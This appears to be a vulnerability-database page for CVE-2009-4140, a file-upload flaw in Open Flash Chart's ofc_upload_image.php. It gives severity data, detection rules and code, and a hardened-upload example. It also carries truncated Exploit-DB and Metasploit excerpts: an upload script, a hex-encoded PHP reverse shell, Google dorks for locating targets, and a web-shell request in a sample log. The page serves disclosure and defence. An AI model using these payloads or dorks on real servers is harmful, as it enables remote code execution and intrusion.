CVE-2009-4140
Published 2009-12-22
Priority P2 · CVSS 2.0 7.5 (high)
Vector AV:N/AC:L/Au:N/C:P/I:P/A:P
ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS 75.84% (99.5th percentile)
Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3, Woopra Analytics Plugin before 1.4.3.2, and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.
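The mechanism in the description above, modelled in Python as an added example (this is not the Open Flash Chart code and not the vendor fix): `vulnerable_destination` reproduces what ofc_upload_image.php does with the caller-supplied name, and `hardened_destination` shows the checks a chart-image save endpoint needs in order to refuse the attack. The function names, the PNG/JPEG allowlist, the `authenticated` flag and the server-chosen filename are this example's own assumptions; the hex payload prefix is copied from the OpenEMR PoC further down the page and decodes to the head of a PHP reverse shell.

```python
"""Model of the ofc_upload_image.php save logic (added example, not the Open Flash
Chart code): vulnerable_destination() reproduces the behaviour the CVE describes,
hardened_destination() shows the checks a chart-image save endpoint needs.
Function names, the allowlist and the session flag are this example's assumptions."""
import os
import re
import secrets

UPLOAD_DIR = "tmp-upload-images"            # directory named in the CVE text
ALLOWED_EXT = {".png", ".jpg", ".jpeg"}     # assumed allowlist for a rendered chart
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")   # PNG and JPEG signatures
PHP_OPEN_TAG = re.compile(rb"<\?php\b|<\?=")  # tags PHP honours regardless of short_open_tag

# First bytes of the hex-encoded payload in the OpenEMR PoC on this page.
# Decoded, it is the head of a PHP reverse shell: this is what a hostile body looks like.
POC_PAYLOAD_PREFIX = bytes.fromhex(
    "3c3f7068700d0a" "7365745f74696d" "655f6c696d6974" "202830293b0d0a"
    "246970203d2027" "3132372e302e30" "2e31273b0d0a"
)


class UploadRejected(Exception):
    pass


def vulnerable_destination(name: str) -> str:
    """What the original script does: trust the caller-supplied name entirely.
    basename() stops directory traversal, but 'shell.php' is written as-is into a
    web-served directory and PHP will execute it on the next GET."""
    return os.path.join(UPLOAD_DIR, os.path.basename(name))


def hardened_destination(name: str, body: bytes, authenticated: bool) -> str:
    """Example policy (not the vendor fix): require a session, allowlist the
    extension, verify the body really is an image, refuse PHP open tags, and
    never reuse the caller's filename on disk."""
    if not authenticated:
        raise UploadRejected("login required")
    ext = os.path.splitext(os.path.basename(name))[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not body.startswith(IMAGE_MAGIC):
        raise UploadRejected("body is not a PNG or JPEG")
    if PHP_OPEN_TAG.search(body):
        raise UploadRejected("PHP open tag inside upload body")
    # Server-chosen name: the client controls neither base name nor extension.
    return os.path.join(UPLOAD_DIR, secrets.token_hex(16) + ext)


def check_upload(name: str, body: bytes, authenticated: bool):
    """Return (destination, None) when accepted, (None, reason) when refused."""
    try:
        return hardened_destination(name, body, authenticated), None
    except UploadRejected as exc:
        return None, str(exc)


if __name__ == "__main__":
    print(POC_PAYLOAD_PREFIX.decode())
    print("vulnerable:", vulnerable_destination("../shell.php"))
    for fname, body in (("shell.php", POC_PAYLOAD_PREFIX),
                        ("shell.png", POC_PAYLOAD_PREFIX),
                        ("chart.png", IMAGE_MAGIC[0] + b"\x00" * 16)):
        print("hardened:", fname, "->", check_upload(fname, body, True))
```

The order of the checks matters less than having all of them: renaming the file alone still leaves a `.php` body in a served directory if the extension is copied from the client, and an extension allowlist alone is bypassed on servers whose handler mapping is broader than `.php`.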
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | matomo | — | — |
| matomo | matomo | — | — |
| matomo | matomo | — | — |
| matomo | matomo | — | — |
| teethgrinder.co.uk | open_flash_chart | — | — |
Detection & IOCs (extracted from sources)
path: administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php
- Detect POST requests to ofc_upload_image.php whose query-string 'name' parameter carries an executable extension (.php and variants): this is the upload vector, since the script writes the raw request body into tmp-upload-images/ under the supplied name without checking the extension.
- Monitor GET requests into tmp-upload-images/ for .php files that follow a POST to ofc_upload_image.php from the same client: this two-step pattern (upload, then execute) is the exploitation sequence; pair on client address and filename rather than alerting on either step alone.
- Alert on HTTP response bodies from ofc_upload_image.php containing 'Saving your image to': the script echoes this string together with the destination path, so its presence confirms the vulnerable component is installed and reachable.
- Flag POST requests to ofc_upload_image.php with Content-Type text/plain: the exploits send the PHP source as a raw body under a type PHP does not parse as a form, so it lands unmodified in $HTTP_RAW_POST_DATA and is written to disk verbatim.
- Use the Google dork from the com_civicrm PoC below ("Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart") to find exposed instances under Joomla CiviCRM installations.
- The CVE description scopes exploitation to systems with PHP's register_globals enabled; with register_globals disabled this particular attack vector does not apply, but detection rules should not assume the setting is off on a given host.
- The OpenEMR variant requires no authentication, whereas the base CVE requires an authenticated user: detection rules should cover both authenticated and unauthenticated exploitation attempts, depending on the target application.
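The rules above as runnable detection logic, added here as an example (not a rule shipped by any of the indexed sources). The input is a constructed JSON-lines HTTP log with assumed field names (ts, src, method, uri, content_type, resp_body); the Piwik-style path, the client addresses and the ten-minute pairing window are likewise assumptions of this example.

```python
"""Detection for the ofc_upload_image.php upload-then-execute sequence (added
example, not a rule from the indexed sources). Input: a JSON-lines HTTP log with
assumed field names ts, src, method, uri, content_type, resp_body."""
import json
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

UPLOAD_SCRIPT = "ofc_upload_image.php"
UPLOAD_DIR = "tmp-upload-images/"
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
PAIR_WINDOW_S = 600   # assumed: a GET within ten minutes of the matching POST counts

# Constructed sample log: one legitimate chart save, one exploitation sequence,
# one unrelated request. Addresses, paths and timestamps are made up.
SAMPLE_LOG = """\
{"ts": 1700000000, "src": "10.0.0.5", "method": "POST", "uri": "/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=chart.png", "content_type": "application/octet-stream", "resp_body": "Saving your image to: ../tmp-upload-images/chart.png"}
{"ts": 1700000100, "src": "198.51.100.7", "method": "POST", "uri": "/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=zx.php", "content_type": "text/plain", "resp_body": "Saving your image to: ../tmp-upload-images/zx.php"}
{"ts": 1700000103, "src": "198.51.100.7", "method": "GET", "uri": "/libs/open-flash-chart/tmp-upload-images/zx.php?cmd=id", "content_type": "", "resp_body": "uid=33(www-data)"}
{"ts": 1700000200, "src": "10.0.0.9", "method": "GET", "uri": "/index.php", "content_type": "", "resp_body": ""}
"""


def upload_name(uri: str):
    """Return the query-string 'name' value when uri targets the upload script, else None."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/" + UPLOAD_SCRIPT):
        return None
    return parse_qs(parts.query).get("name", [None])[0]


def detect(log_text: str):
    """Run the four rules over the log; return (rule, src, filename) triples."""
    alerts = []
    uploads = defaultdict(list)          # (src, filename) -> POST timestamps
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        src, ts = ev["src"], ev["ts"]
        name = upload_name(ev["uri"]) if ev["method"] == "POST" else None
        if name is not None:
            fname = name.rsplit("/", 1)[-1]          # the part the script keeps on disk
            if EXEC_EXT.search(fname):
                alerts.append(("upload_exec_ext", src, fname))
            ctype = ev.get("content_type", "").split(";")[0].strip().lower()
            if ctype == "text/plain":
                alerts.append(("raw_post_text_plain", src, fname))
            if "Saving your image to" in ev.get("resp_body", ""):
                alerts.append(("ofc_upload_present", src, fname))
            uploads[(src, fname)].append(ts)
        elif ev["method"] == "GET":
            path = urlsplit(ev["uri"]).path
            if UPLOAD_DIR in path:
                fname = path.rsplit("/", 1)[-1]
                recent = [t for t in uploads.get((src, fname), [])
                          if 0 <= ts - t <= PAIR_WINDOW_S]
                if EXEC_EXT.search(fname) and recent:
                    alerts.append(("upload_then_execute", src, fname))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

The pairing rule keys on (source address, filename), so a scanner that only POSTs, or a GET for an unrelated file, does not produce the high-confidence alert; the response-body rule fires on legitimate chart saves as well and is an inventory signal for the vulnerable component rather than an attack indicator.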
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | LOW | — |
Debian
CVE-2009-4140: matomo - Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Cha...
vendor_debian·2009·CVSS 7.5 · HIGH
Scope: local
sid: resolved
trixie: resolved
GHSA
GHSA-x396-wp63-mv42: Unrestricted file upload vulnerability in ofc_upload_image
ghsa_unreviewed·2022-05-02 · HIGH
VulnCheck
teethgrinder.co.uk open_flash_chart Unrestricted Upload of File with Dangerous Type
vulncheck·2009·CVSS 7.5 · HIGH
Affected: teethgrinder.co.uk open_flash_chart
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are
No detection rules found.
Exploit-DB
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
exploitdb·2013-10-26
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Class header and initialize() preamble restored from the standard module
# skeleton: the page extraction dropped the text between the '<' of the
# superclass and the '>' of the first hash key.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Open Flash Chart v2 Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a file upload vulnerability found in Open Flash
        Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file
        in order to upload and execute malicious PHP files.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Braeden Thomas', # Initial discovery + Piwik PoC
          'Gjoko Krstic',   # OpenEMR PoC
          'Halim Cruzito',  # zonPHP PoC
          'Brendan Coles'   # Metasploit
        ],
      'References'     =>
        [
          ['BID', '37314'],
          ['CVE', '2009-4140'],
          ['OSVDB', '59051'],
          ['EDB', '10532']
        ],
      'Payload'        =>
        {
          'Space'
```
Exploit-DB
ZonPHP 2.25 - Remote Code Execution
exploitdb·2013-10-20
---
```php
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7
# PoC:
";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",
                 "Content-Type: text/plain");
$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt($rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);
$shell
```
Exploit-DB
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
exploitdb·2013-04-22
---
```php
# Exploit Title: joomla component com_civicrm remote code injection exploit
# Google Dork: "Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
# Usage: php exp.php -u http://target.com/ -f post.php
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
    die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
    -u http://target.com/ The full path to Joomla!
    -f post.php The name of the file to create.\n");
$url = $options['u'];
$fi
```
Exploit-DB
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
exploitdb·2013-02-20
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Class header and initialize() preamble restored from the standard module
# skeleton: the page extraction dropped the text between the '<' of the
# superclass and the '>' of the first hash key.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "OpenEMR PHP File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the
        ofc_upload_image.php file from the openflashchart library, a malicious user can
        upload a file to the tmp-upload-images directory without any authentication, which
        results in arbitrary code execution. The module has been tested successfully on
        OpenEMR 4.1.1 over Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Auth
```
Exploit-DB
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
exploitdb·2013-02-13
---
```php
$errstr ($errno)\n";
die();
}
function r_shell($sc)
{
for($z = 0; $z Usage: php $argv[0] \n\n";
die();
}
$pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974".
              "202830293b0d0a". "246970203d2027". "3132372e302e30".
              "2e31273b0d0a24". "706f7274203d20". "313233343b0d0a".
              "246368756e6b5f". "73697a65203d20". "313430303b0d0a".
              "2477726974655f". "61203d206e756c". "6c3b2024657272".
              "6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20".
              "3d2027756e616d". "65202d613b2077". "3b2069643b202f".
              "62696e2f736820". "2d69273b0d0a24".
              "6461656d6f6e20". "3d20303b202464".
              "65627567203d20". "303b0d0a696620".
              "2866756e637469". "6f6e5f65786973".
              "7473282770636e". "746c5f666f726b".
              "272929207b0d0a". "24706964203d20".
              "70636e746c5f66
```
Exploit-DB
Piwik Open Flash Chart - Remote Code Execution
exploitdb·2009-12-17
---
Bugtraq ID: 37314
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 14 2009 12:00AM
Updated: Dec 17 2009 06:03PM
Credit: Braeden Thomas
Vulnerable:
- Piwik Piwik 0.4.3
- Piwik Piwik 0.4.2
- Piwik Piwik 0.4.1
- Piwik Piwik 0.4
- Piwik Piwik 0.2.37
- Piwik Piwik 0.2.36
- Piwik Piwik 0.2.35
- Open Web Analytics Open Web Analytics 1.2.0
- Open Flash Chart Open Flash Chart 2.0

Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also
Metasploit
Open Flash Chart v2 Arbitrary File Upload
metasploit
This module exploits a file upload vulnerability found in Open Flash Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file in order to upload and execute malicious PHP files.
Metasploit
OpenEMR PHP File Upload Vulnerability
metasploit
This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04.
No writeups or analysis indexed.
References
http://packetstormsecurity.com/files/123493/wpseowatcher-exec.txt
http://packetstormsecurity.com/files/123494/wpslimstatex-exec.txt
http://packetstormsecurity.org/0910-exploits/piwik-upload.txt
http://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/
http://secunia.com/advisories/37078
http://secunia.com/advisories/37911
http://secunia.com/advisories/55160
http://secunia.com/advisories/55162
http://wordpress.org/extend/plugins/woopra/changelog/
http://www.exploit-db.com/exploits/24969
http://www.openwall.com/lists/oss-security/2009/12/14/1
http://www.openwall.com/lists/oss-security/2009/12/14/3
http://www.osvdb.org/59051
http://www.securityfocus.com/bid/37314
http://www.vupen.com/english/advisories/2009/2966
https://exchange.xforce.ibmcloud.com/vulnerabilities/53825